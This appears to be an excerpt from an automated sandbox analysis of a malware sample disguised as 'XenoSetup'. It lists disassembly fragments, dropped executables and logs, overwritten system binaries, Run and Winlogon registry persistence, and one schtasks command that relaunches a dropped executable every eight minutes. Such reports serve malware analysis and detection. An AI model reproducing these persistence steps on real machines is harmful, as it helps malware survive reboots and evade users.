                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeCode function: 31_2_00007FFD348CC308 push E8FFFFFEh; iretd 31_2_00007FFD348CC30D
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeCode function: 31_2_00007FFD348C8FEB push ss; iretd 31_2_00007FFD348C8FF9
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeCode function: 31_2_00007FFD348C93B7 push edx; retf 31_2_00007FFD348C93BD
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeCode function: 31_2_00007FFD348B387A push ds; iretd 31_2_00007FFD348B3887
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeCode function: 31_2_00007FFD348B6BD4 push cs; iretd 31_2_00007FFD348B6BD5
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeCode function: 31_2_00007FFD348D5D88 pushad ; retf 31_2_00007FFD348D5D89
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeCode function: 31_2_00007FFD348D4ED3 push esi; iretd 31_2_00007FFD348D5537
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeCode function: 32_2_00007FFD348BC308 push E8FFFFFEh; iretd 32_2_00007FFD348BC30D
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeCode function: 32_2_00007FFD348B8FEB push ss; iretd 32_2_00007FFD348B8FF9
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeCode function: 32_2_00007FFD348B93B7 push edx; retf 32_2_00007FFD348B93BD
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeCode function: 32_2_00007FFD348C5D88 pushad ; retf 32_2_00007FFD348C5D89
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeCode function: 32_2_00007FFD348C4ED3 push esi; iretd 32_2_00007FFD348C5537
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeCode function: 32_2_00007FFD348A3884 push ds; iretd 32_2_00007FFD348A3887
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeCode function: 32_2_00007FFD348A6BD4 push cs; iretd 32_2_00007FFD348A6BD5
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeCode function: 40_2_00007FFD348C5D88 pushad ; retf 40_2_00007FFD348C5D89
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeCode function: 40_2_00007FFD348C4ED3 push esi; iretd 40_2_00007FFD348C5537
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeCode function: 40_2_00007FFD348A387A push ds; iretd 40_2_00007FFD348A3887
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeCode function: 40_2_00007FFD348A6BD4 push cs; iretd 40_2_00007FFD348A6BD5
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeCode function: 40_2_00007FFD348BC308 push E8FFFFFEh; iretd 40_2_00007FFD348BC30D
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeCode function: 40_2_00007FFD348B8FEB push ss; iretd 40_2_00007FFD348B8FF9
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeCode function: 40_2_00007FFD348B93B7 push edx; retf 40_2_00007FFD348B93BD
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeCode function: 41_2_00007FFD3489387A push ds; iretd 41_2_00007FFD34893887
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeCode function: 41_2_00007FFD34896BD4 push cs; iretd 41_2_00007FFD34896BD5
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeCode function: 41_2_00007FFD348AC308 push E8FFFFFEh; iretd 41_2_00007FFD348AC30D

                      Persistence and Installation Behavior

                      barindex
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: unknownExecutable created and started: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Windows\System32\SecurityHealthSystray.exe
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeFile created: C:\Users\user\Desktop\jCRLjesV.logJump to dropped file
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeFile created: C:\Users\user\Desktop\ogLKbooN.logJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeFile created: C:\Users\user\Desktop\KZGGSUqY.logJump to dropped file
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeFile created: C:\Users\user\Desktop\tBjJkMRH.logJump to dropped file
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeFile created: C:\Users\user\Desktop\BFVQSOun.logJump to dropped file
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeFile created: C:\Users\user\Desktop\UWIwmTED.logJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeFile created: C:\portBrokerDll\DriverbrokerCrtDhcp.exeJump to dropped file
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeFile created: C:\Users\user\Desktop\dQveIBvX.logJump to dropped file
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeFile created: C:\Users\user\Desktop\gQJUAkON.logJump to dropped file
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeFile created: C:\Users\user\Desktop\BOtQCANk.logJump to dropped file
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeFile created: C:\Users\user\Desktop\NoWOUMSl.logJump to dropped file
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeFile created: C:\Users\user\Desktop\FSpHSmDL.logJump to dropped file
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeFile created: C:\Users\user\Desktop\RPLnQAKH.logJump to dropped file
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeFile created: C:\Users\user\Desktop\eDXMSiYF.logJump to dropped file
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeFile created: C:\Users\user\Desktop\lmJukoKX.logJump to dropped file
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeFile created: C:\Users\user\Desktop\paukoYZl.logJump to dropped file
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeFile created: C:\Users\user\Desktop\WKMEYgAB.logJump to dropped file
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeFile created: C:\Users\user\Desktop\ZTxvzCno.logJump to dropped file
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeFile created: C:\Users\user\Desktop\BcHAIFcQ.logJump to dropped file
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeFile created: C:\Users\user\Desktop\kEjDZxDz.logJump to dropped file
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeFile created: C:\Users\user\Desktop\uOpJsBHp.logJump to dropped file
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeFile created: C:\Users\user\Desktop\GyShWgyC.logJump to dropped file
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeFile created: C:\Users\user\Desktop\qodKYthi.logJump to dropped file
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeFile created: C:\Users\user\Desktop\vMsrqipz.logJump to dropped file
                      Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exeFile created: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeJump to dropped file
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeFile created: C:\Users\user\Desktop\eLGexRyL.logJump to dropped file
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeFile created: C:\Users\user\Desktop\MPdHuBxA.logJump to dropped file
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeFile created: C:\Users\user\Desktop\bGOWfMqu.logJump to dropped file
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeFile created: C:\Users\user\Desktop\GpvhmufF.logJump to dropped file
                      Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exeFile created: C:\Users\user\AppData\Local\Temp\Xeno.exeJump to dropped file
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeFile created: C:\Users\user\Desktop\ItmQLqVf.logJump to dropped file
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeFile created: C:\Users\user\Desktop\ZSKNtyuw.logJump to dropped file
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeFile created: C:\Users\user\Desktop\remTNUPL.logJump to dropped file
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeFile created: C:\Users\user\Desktop\UfDWuYEk.logJump to dropped file
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeFile created: C:\Users\user\Desktop\LxMgmcSS.logJump to dropped file
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeFile created: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe.exe (copy)Jump to dropped file
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeFile created: C:\Users\user\Desktop\frbUEvTD.logJump to dropped file
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeFile created: C:\Users\user\Desktop\vcvJAqxW.logJump to dropped file
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeFile created: C:\Users\user\Desktop\Aqnqislq.logJump to dropped file
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeFile created: C:\Users\user\Desktop\xvoKkvvU.logJump to dropped file
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeFile created: C:\Users\user\Desktop\NpzpwslB.logJump to dropped file
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeFile created: C:\Users\user\Desktop\ARRIhAyp.logJump to dropped file
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeFile created: C:\Users\user\Desktop\ldZbGFkR.logJump to dropped file
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeFile created: C:\Users\user\Desktop\LuUydMov.logJump to dropped file
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeFile created: C:\Users\user\Desktop\PIQPERQj.logJump to dropped file
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeFile created: C:\Users\user\Desktop\pczkrlLQ.logJump to dropped file
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeFile created: C:\Users\user\Desktop\IlCyhHua.logJump to dropped file
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeFile created: C:\Users\user\Desktop\GGCzAPYH.logJump to dropped file
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeFile created: C:\Users\user\Desktop\ESyrPCdJ.logJump to dropped file
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeFile created: C:\Users\user\Desktop\TZhoQTpI.logJump to dropped file
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeFile created: C:\Users\user\Desktop\XOSeUCEW.logJump to dropped file
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeFile created: C:\Users\user\Desktop\NZUxJEKO.logJump to dropped file
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeFile created: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeFile created: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeJump to dropped file
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeFile created: C:\Users\user\Desktop\tBjJkMRH.logJump to dropped file
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeFile created: C:\Users\user\Desktop\KZGGSUqY.logJump to dropped file
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeFile created: C:\Users\user\Desktop\Aqnqislq.logJump to dropped file
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeFile created: C:\Users\user\Desktop\bGOWfMqu.logJump to dropped file
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeFile created: C:\Users\user\Desktop\ItmQLqVf.logJump to dropped file
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeFile created: C:\Users\user\Desktop\pczkrlLQ.logJump to dropped file
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeFile created: C:\Users\user\Desktop\WKMEYgAB.logJump to dropped file
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeFile created: C:\Users\user\Desktop\lmJukoKX.logJump to dropped file
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeFile created: C:\Users\user\Desktop\TZhoQTpI.logJump to dropped file
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeFile created: C:\Users\user\Desktop\RPLnQAKH.logJump to dropped file
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeFile created: C:\Users\user\Desktop\IlCyhHua.logJump to dropped file
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeFile created: C:\Users\user\Desktop\remTNUPL.logJump to dropped file
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeFile created: C:\Users\user\Desktop\ZSKNtyuw.logJump to dropped file
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeFile created: C:\Users\user\Desktop\NZUxJEKO.logJump to dropped file
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeFile created: C:\Users\user\Desktop\vMsrqipz.logJump to dropped file
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeFile created: C:\Users\user\Desktop\ldZbGFkR.logJump to dropped file
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeFile created: C:\Users\user\Desktop\UWIwmTED.logJump to dropped file
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeFile created: C:\Users\user\Desktop\BFVQSOun.logJump to dropped file
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeFile created: C:\Users\user\Desktop\ogLKbooN.logJump to dropped file
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeFile created: C:\Users\user\Desktop\ARRIhAyp.logJump to dropped file
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeFile created: C:\Users\user\Desktop\LxMgmcSS.logJump to dropped file
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeFile created: C:\Users\user\Desktop\BOtQCANk.logJump to dropped file
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeFile created: C:\Users\user\Desktop\jCRLjesV.logJump to dropped file
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeFile created: C:\Users\user\Desktop\ZTxvzCno.logJump to dropped file
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeFile created: C:\Users\user\Desktop\ESyrPCdJ.logJump to dropped file
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeFile created: C:\Users\user\Desktop\BcHAIFcQ.logJump to dropped file
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeFile created: C:\Users\user\Desktop\qodKYthi.logJump to dropped file
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeFile created: C:\Users\user\Desktop\NoWOUMSl.logJump to dropped file
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeFile created: C:\Users\user\Desktop\vcvJAqxW.logJump to dropped file
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeFile created: C:\Users\user\Desktop\PIQPERQj.logJump to dropped file
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeFile created: C:\Users\user\Desktop\xvoKkvvU.logJump to dropped file
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeFile created: C:\Users\user\Desktop\uOpJsBHp.logJump to dropped file
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeFile created: C:\Users\user\Desktop\NpzpwslB.logJump to dropped file
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeFile created: C:\Users\user\Desktop\dQveIBvX.logJump to dropped file
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeFile created: C:\Users\user\Desktop\UfDWuYEk.logJump to dropped file
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeFile created: C:\Users\user\Desktop\gQJUAkON.logJump to dropped file
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeFile created: C:\Users\user\Desktop\FSpHSmDL.logJump to dropped file
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeFile created: C:\Users\user\Desktop\MPdHuBxA.logJump to dropped file
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeFile created: C:\Users\user\Desktop\GpvhmufF.logJump to dropped file
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeFile created: C:\Users\user\Desktop\paukoYZl.logJump to dropped file
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeFile created: C:\Users\user\Desktop\frbUEvTD.logJump to dropped file
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeFile created: C:\Users\user\Desktop\XOSeUCEW.logJump to dropped file
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeFile created: C:\Users\user\Desktop\GGCzAPYH.logJump to dropped file
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeFile created: C:\Users\user\Desktop\eLGexRyL.logJump to dropped file
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeFile created: C:\Users\user\Desktop\LuUydMov.logJump to dropped file
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeFile created: C:\Users\user\Desktop\kEjDZxDz.logJump to dropped file
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeFile created: C:\Users\user\Desktop\GyShWgyC.logJump to dropped file
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeFile created: C:\Users\user\Desktop\eDXMSiYF.logJump to dropped file
                      Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\XenoSetup(2).exe.bin.exe.logJump to behavior

                      Boot Survival

                      barindex
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run NZdXlPbVdUubKXQJump to behavior
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                      Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run XenoSetup(1)Jump to behavior
                      Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run XenoSetup(1)Jump to behavior
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run NZdXlPbVdUubKXQJump to behavior
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run DriverbrokerCrtDhcpJump to behavior
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "NZdXlPbVdUubKXQN" /sc MINUTE /mo 8 /tr "'C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe'" /f
                      Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run XenoSetup(1)Jump to behavior
                      Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run XenoSetup(1)Jump to behavior
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run NZdXlPbVdUubKXQJump to behavior
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run NZdXlPbVdUubKXQJump to behavior
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run NZdXlPbVdUubKXQJump to behavior
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run NZdXlPbVdUubKXQJump to behavior
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run DriverbrokerCrtDhcpJump to behavior
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run DriverbrokerCrtDhcpJump to behavior
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run DriverbrokerCrtDhcpJump to behavior
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run DriverbrokerCrtDhcpJump to behavior

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
